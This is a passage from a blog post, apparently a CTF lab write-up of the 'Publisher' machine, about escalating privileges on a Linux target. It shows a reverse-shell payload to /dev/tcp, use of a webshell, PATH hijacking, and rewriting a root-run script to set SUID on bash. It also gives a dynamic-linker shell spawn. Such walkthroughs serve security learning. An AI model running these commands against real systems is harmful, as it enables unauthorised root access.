\/opt\ngetfacl: Removing leading &#039;\/&#039; from absolute path names\n# file: opt\n# owner: root\n# group: 
root\nuser::rwx\ngroup::r-x\nother::r-x<\/code><\/pre>\n<p>What is going on, why can it not be read... Tried running it and found the permissions are not sufficient either... Try transferring it to the local machine:<\/p>\n<pre><code class=\"language-bash\">think@publisher:\/tmp$ cp \/usr\/sbin\/run_container .<\/code><\/pre>\n<p>Then transfer it over and decompile it:<\/p>\n<pre><code class=\"language-c\">int __cdecl main(int argc, const char **argv, const char **envp)\n{\n  __int64 v3; \/\/ rbp\n  int result; \/\/ eax\n  unsigned __int64 v5; \/\/ rdx\n  unsigned __int64 v6; \/\/ rt1\n  const char *v7; \/\/ [rsp-38h] [rbp-38h]\n  const char *v8; \/\/ [rsp-30h] [rbp-30h]\n  const char *v9; \/\/ [rsp-28h] [rbp-28h]\n  const char *v10; \/\/ [rsp-20h] [rbp-20h]\n  __int64 v11; \/\/ [rsp-18h] [rbp-18h]\n  unsigned __int64 v12; \/\/ [rsp-10h] [rbp-10h]\n  __int64 v13; \/\/ [rsp-8h] [rbp-8h]\n\n  __asm { endbr64 }\n  v13 = v3;\n  v12 = __readfsqword(0x28u);\n  v7 = &quot;\/bin\/bash&quot;;\n  v8 = &quot;-p&quot;;\n  v9 = &quot;\/opt\/run_container.sh&quot;;\n  v10 = argv[1];\n  v11 = 0LL;\n  sub_1070(&quot;\/bin\/bash&quot;, &amp;v7, 0LL);\n  result = 0;\n  v6 = __readfsqword(0x28u);\n  v5 = v6 ^ v12;\n  if ( v6 != v12 )\n    result = sub_1060(&quot;\/bin\/bash&quot;, &amp;v7, v5);\n  return result;\n}<\/code><\/pre>\n<p>It seems to call bash and then run the program? At this point I realized that the think user's shell is not bash...<\/p>\n<pre><code class=\"language-bash\">think@publisher:\/tmp$ 
env\nSHELL=\/usr\/sbin\/ash\nPWD=\/tmp\nLOGNAME=think\nXDG_SESSION_TYPE=tty\nMOTD_SHOWN=pam\nHOME=\/home\/think\nLANG=en_US.UTF-8\nLS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.zst=01;31:*.tzst=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.wim=01;31:*.swm=01;31:*.dwm=01;31:*.esd=01;31:*.jpg=01;35:*.jpeg=01;35:*.mjpg=01;35:*.mjpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.m4a=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.oga=00;36:*.opus=00;36:*.spx=00;36:*.xspf=00;36:\nSSH_CONNECTION=192.168.0.143 47128 192.168.0.188 22\nLESSCLOSE=\/usr\/bin\/lesspipe %s %s\nXDG_SESSION_CLASS=user\nTERM=xterm-256color\nLESSOPEN=| \/usr\/bin\/lesspipe %s\nUSER=think\nSHLVL=2\nXDG_SESSION_ID=7\nXDG_RUNTIME_DIR=\/run\/user\/1000\nSSH_CLIENT=192.168.0.143 47128 
22\nPATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/usr\/sbin:\/usr\/bin:\/sbin:\/bin:\/usr\/games:\/usr\/local\/games:\/snap\/bin\nDBUS_SESSION_BUS_ADDRESS=unix:path=\/run\/user\/1000\/bus\nSSH_TTY=\/dev\/pts\/0\n_=\/usr\/bin\/env\nOLDPWD=\/home\/think\nthink@publisher:\/tmp$ cat \/etc\/passwd | grep &quot;think&quot;\nthink:x:1000:1000:,,,:\/home\/think:\/usr\/sbin\/ash<\/code><\/pre>\n<p>It is ash; try to get bash... Upload linpeas.sh.<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407101724889.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407101724889.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240710155711561\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<p>Still not sure what to do; try sending a shell to <code>pwncat-cs<\/code>:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407101724890.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407101724890.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240710160527018\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>It cannot automatically switch to bash... No luck. Tried executing it and found that the <code>.sh<\/code> can actually be executed...<\/p>\n<pre><code class=\"language-bash\">think@publisher:~$ \/opt\/run_container.sh\npermission denied while trying to connect to the Docker daemon socket at unix:\/\/\/var\/run\/docker.sock: Get &quot;http:\/\/%2Fvar%2Frun%2Fdocker.sock\/v1.24\/containers\/json?all=1&quot;: dial unix \/var\/run\/docker.sock: connect: permission denied\ndocker: permission denied while trying to connect to the Docker daemon socket at unix:\/\/\/var\/run\/docker.sock: Post &quot;http:\/\/%2Fvar%2Frun%2Fdocker.sock\/v1.24\/containers\/create&quot;: dial unix \/var\/run\/docker.sock: connect: permission denied.\nSee &#039;docker run --help&#039;.\nList of Docker containers:\npermission denied while trying to connect to the Docker daemon socket at unix:\/\/\/var\/run\/docker.sock: Get &quot;http:\/\/%2Fvar%2Frun%2Fdocker.sock\/v1.24\/containers\/json?all=1&quot;: dial unix \/var\/run\/docker.sock: connect: permission denied\n\nEnter the ID of the container or leave blank to create a new one: 123456\n\/opt\/run_container.sh: line 16: validate_container_id: command not found\n\nOPTIONS:\n1) Start Container\n2) Stop Container\n3) Restart Container\n4) Create Container\n5) Quit\nChoose an action for a container: <\/code><\/pre>\n<p>It asks for an <code>ID<\/code> and runs through docker... One command is not found, so try hijacking it:<\/p>\n<pre><code 
class=\"language-bash\">think@publisher:\/tmp$ touch validate_container_id\nthink@publisher:\/tmp$ nano validate_container_id\nthink@publisher:\/tmp$ cat validate_container_id \n#!\/bin\/bash\n\nbash -i &amp;&gt;\/dev\/tcp\/192.168.0.143\/1234 &lt;&amp;1\nthink@publisher:\/tmp$ echo $PATH\n\/usr\/local\/sbin:\/usr\/local\/bin:\/usr\/sbin:\/usr\/bin:\/sbin:\/bin:\/usr\/games:\/usr\/local\/games:\/snap\/bin\nthink@publisher:\/tmp$ PATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/usr\/sbin:\/usr\/bin:\/sbin:\/bin:\/usr\/games:\/usr\/local\/games:\/snap\/bin:\/tmp\nthink@publisher:\/tmp$ cd \/\nthink@publisher:\/$ validate_container_id\n-ash: \/tmp\/validate_container_id: Permission denied<\/code><\/pre>\n<p>Try executing the command!<\/p>\n<pre><code class=\"language-bash\">think@publisher:\/$ \/opt\/run_container.sh\npermission denied while trying to connect to the Docker daemon socket at unix:\/\/\/var\/run\/docker.sock: Get &quot;http:\/\/%2Fvar%2Frun%2Fdocker.sock\/v1.24\/containers\/json?all=1&quot;: dial unix \/var\/run\/docker.sock: connect: permission denied\ndocker: permission denied while trying to connect to the Docker daemon socket at unix:\/\/\/var\/run\/docker.sock: Post &quot;http:\/\/%2Fvar%2Frun%2Fdocker.sock\/v1.24\/containers\/create&quot;: dial unix \/var\/run\/docker.sock: connect: permission denied.\nSee &#039;docker run --help&#039;.\nList of Docker containers:\npermission denied while trying to connect to the Docker daemon socket at unix:\/\/\/var\/run\/docker.sock: Get &quot;http:\/\/%2Fvar%2Frun%2Fdocker.sock\/v1.24\/containers\/json?all=1&quot;: dial unix \/var\/run\/docker.sock: connect: permission denied\n\nEnter the ID of the container or leave blank to create a new one: 123456\n\/opt\/run_container.sh: line 16: \/tmp\/validate_container_id: Permission denied\n\nOPTIONS:\n1) Start Container\n2) Stop Container\n3) Restart Container\n4) Create Container\n5) Quit\nChoose an action for a container: 1\npermission denied while trying 
to connect to the Docker daemon socket at unix:\/\/\/var\/run\/docker.sock: Post &quot;http:\/\/%2Fvar%2Frun%2Fdocker.sock\/v1.24\/containers\/123456\/start&quot;: dial unix \/var\/run\/docker.sock: connect: permission denied\nError: failed to start containers: 123456<\/code><\/pre>\n<p>Nothing is found, so (I picked this up from a group member's writeup) let's check whether the one obtained earlier through SPIP has it:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~]\n\u2514\u2500$ curl &quot;http:\/\/$IP\/spip\/webshell.php?0=whoami;id;hostname&quot;\nwww-data\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\n41c976e507f8<\/code><\/pre>\n<p>Found the ID and tried running it, but it had no effect, so grant execute permission!<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407101724891.png\" alt=\"image-20240710171715758\" \/><br \/>\n<img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407101724892.png\" alt=\"image-20240710171726046\" \/><\/p>\n<p>It can be read now, so try modifying it!<\/p>\n<h3>bash -p<\/h3>\n<p>Now it can be modified normally, and running the SUID file from earlier escalates privileges!<\/p>\n<pre><code class=\"language-bash\">(remote) think@publisher:\/tmp$ cat \/opt\/run_container.sh\n#!\/bin\/bash\n\n# Function to list Docker containers\nlist_containers() {\n    if [ -z &quot;$(docker ps -aq)&quot; ]; then\n        docker run -d --restart always -p 8000:8000 -v \/home\/think:\/home\/think 4b5aec41d6ef;\n    fi\n    echo &quot;List of Docker containers:&quot;\n    docker ps -a --format &quot;ID: {{.ID}} | Name: {{.Names}} | Status: {{.Status}}&quot;\n    echo &quot;&quot;\n}\n\n# Function to prompt user for container ID\nprompt_container_id() {\n    read -p &quot;Enter the ID of the container or leave blank to create a new one: &quot; container_id\n    validate_container_id &quot;$container_id&quot;\n}\n\n# Function to display options and perform actions\nselect_action() {\n    echo &quot;&quot;\n    echo &quot;OPTIONS:&quot;\n    local container_id=&quot;$1&quot;\n    PS3=&quot;Choose an action for a container: &quot;\n    options=(&quot;Start Container&quot; &quot;Stop Container&quot; &quot;Restart Container&quot; &quot;Create Container&quot; &quot;Quit&quot;)\n\n    select opt in &quot;${options[@]}&quot;; do\n        case $REPLY in\n  
          1) docker start &quot;$container_id&quot;; break ;;\n            2)  if [ $(docker ps -q | wc -l) -lt 2 ]; then\n                    echo &quot;No enough containers are currently running.&quot;\n                    exit 1\n                fi\n                docker stop &quot;$container_id&quot;\n                break ;;\n            3) docker restart &quot;$container_id&quot;; break ;;\n            4) echo &quot;Creating a new container...&quot;\n               docker run -d --restart always -p 80:80 -v \/home\/think:\/home\/think spip-image:latest \n               break ;;\n            5) echo &quot;Exiting...&quot;; exit ;;\n            *) echo &quot;Invalid option. Please choose a valid option.&quot; ;;\n        esac\n    done\n}\n\n# Main script execution\nlist_containers\nprompt_container_id  # Get the container ID from prompt_container_id function\nselect_action &quot;$container_id&quot;  # Pass the container ID to select_action function\n(remote) think@publisher:\/tmp$ echo &#039;#!\/bin\/bash&#039; &gt; \/opt\/run_container.sh\n(remote) think@publisher:\/tmp$ echo &#039;chmod +s \/bin\/bash&#039; &gt;&gt; \/opt\/run_container.sh\n(remote) think@publisher:\/tmp$ ls -la \/bin\/bash\n-rwxr-xr-x 1 root root 1183448 Apr 18  2022 \/bin\/bash\n(remote) think@publisher:\/tmp$ \/usr\/sbin\/run_container\n(remote) think@publisher:\/tmp$ ls -la \/bin\/bash\n-rwsr-sr-x 1 root root 1183448 Apr 18  2022 \/bin\/bash\n(remote) think@publisher:\/tmp$ bash -p\n(remote) root@publisher:\/tmp# cd ~\n(remote) root@publisher:\/home\/think# ls -la\ntotal 48\ndrwxr-xr-x 8 think    think    4096 Feb 10 21:27 .\ndrwxr-xr-x 3 root     root     4096 Nov 13  2023 ..\nlrwxrwxrwx 1 root     root        9 Jun 21  2023 .bash_history -&gt; \/dev\/null\n-rw-r--r-- 1 think    think     220 Nov 14  2023 .bash_logout\n-rw-r--r-- 1 think    think    3771 Nov 14  2023 .bashrc\ndrwx------ 2 think    think    4096 Nov 14  2023 .cache\ndrwx------ 3 think    think    4096 Dec  8  2023 
.config\ndrwx------ 3 think    think    4096 Jul 10 07:50 .gnupg\ndrwxrwxr-x 3 think    think    4096 Jan 10 12:46 .local\n-rw-r--r-- 1 think    think     807 Nov 14  2023 .profile\nlrwxrwxrwx 1 think    think       9 Feb 10 21:27 .python_history -&gt; \/dev\/null\ndrwxr-x--- 5 www-data www-data 4096 Dec 20  2023 spip\ndrwxr-xr-x 2 think    think    4096 Jan 10 12:54 .ssh\n-rw-r--r-- 1 root     root       35 Feb 10 21:20 user.txt\nlrwxrwxrwx 1 think    think       9 Feb 10 21:27 .viminfo -&gt; \/dev\/null\n(remote) root@publisher:\/home\/think# whoami;id\nroot\nuid=1000(think) gid=1000(think) euid=0(root) egid=0(root) groups=0(root),1000(think)\n(remote) root@publisher:\/home\/think# cd \/root\n(remote) root@publisher:\/root# ls -la\ntotal 56\ndrwx------  7 root  root   4096 Mar 29 13:25 .\ndrwxr-xr-x 18 root  root   4096 Nov 14  2023 ..\nlrwxrwxrwx  1 root  root      9 Jun  2  2023 .bash_history -&gt; \/dev\/null\n-rw-r--r--  1 root  root   3246 Jun 21  2023 .bashrc\ndrwx------  2 root  root   4096 Nov 11  2023 .cache\ndrwx------  3 root  root   4096 Dec  8  2023 .config\ndrwxr-xr-x  3 root  root   4096 Jun 21  2023 .local\nlrwxrwxrwx  1 root  root      9 Nov 11  2023 .mysql_history -&gt; \/dev\/null\n-rw-r--r--  1 root  root    161 Dec  5  2019 .profile\n-rw-r-----  1 root  root     35 Feb 10 21:20 root.txt\n-rw-r--r--  1 root  root     75 Nov 13  2023 .selected_editor\ndrwxr-x---  5 think think  4096 Dec  7  2023 spip\ndrwx------  2 root  root   4096 Dec 20  2023 .ssh\n-rw-rw-rw-  1 root  root  11913 Mar 29 13:25 .viminfo\n(remote) root@publisher:\/root# cat root.txt \n3a4225cc9e85709adda6ef55d6a4f2ca<\/code><\/pre>\n<h2>Extra Takeaways<\/h2>\n<p>Here I saw that the author spawns a bash shell through the dynamic linker, which is very convenient!!!<\/p>\n<pre><code class=\"language-bash\">\/lib\/x86_64-linux-gnu\/ld-linux-x86\u201364.so.2 
\/bin\/bash<\/code><\/pre>\n<p>Here I adapt it to the local system and use the file with the different name:<\/p>\n<pre><code class=\"language-bash\">think@publisher:\/tmp$ ls \/lib\/x86_64-linux-gnu\/ | grep &#039;x86-64&#039;\nld-linux-x86-64.so.2\nlibpyldb-util.cpython-38-x86-64-linux-gnu.so.2\nlibpyldb-util.cpython-38-x86-64-linux-gnu.so.2.4.4\nlibpytalloc-util.cpython-38-x86-64-linux-gnu.so.2\nlibpytalloc-util.cpython-38-x86-64-linux-gnu.so.2.3.3\nlibsamba-policy.cpython-38-x86-64-linux-gnu.so.0\nlibsamba-policy.cpython-38-x86-64-linux-gnu.so.0.0.1\nthink@publisher:\/tmp$ \/lib\/x86_64-linux-gnu\/ld-linux-x86-64.so.2 \/bin\/bash\nthink@publisher:\/tmp$ echo $SHELL\n\/usr\/sbin\/ash\nthink@publisher:\/tmp$ cd \/opt\nthink@publisher:\/opt$ ls -la\ntotal 20\ndrwxr-xr-x  3 root root 4096 Mar 29 13:25 .\ndrwxr-xr-x 18 root root 4096 Nov 14  2023 ..\ndrwx--x--x  4 root root 4096 Nov 14  2023 containerd\n-rw-r--r--  1 root root  861 Dec  7  2023 dockerfile\n-rwxrwxrwx  1 root root   31 Jul 10 09:19 run_container.sh<\/code><\/pre>\n<p>This achieves the same effect as before!!! Awesome!!!<\/p>\n<h2>References<\/h2>\n<p><a href=\"https:\/\/github.com\/Brntpcnr\/WriteupsHMV\/blob\/main\/Publisher.txt\">https:\/\/github.com\/Brntpcnr\/WriteupsHMV\/blob\/main\/Publisher.txt<\/a><\/p>\n<p><a href=\"https:\/\/blog.findtodd.com\/2024\/06\/19\/hmv-Publisher\/\">https:\/\/blog.findtodd.com\/2024\/06\/19\/hmv-Publisher\/<\/a><\/p>\n<p><a href=\"https:\/\/medium.com\/@josemlwdf\/publisher-cccb172abd8e\">https:\/\/medium.com\/@josemlwdf\/publisher-cccb172abd8e<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Publisher Information Gathering Port Scanning \u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/publisher] \u2514 
[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-750","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/750","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=750"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/750\/revisions"}],"predecessor-version":[{"id":751,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/750\/revisions\/751"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=750"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=750"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=750"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}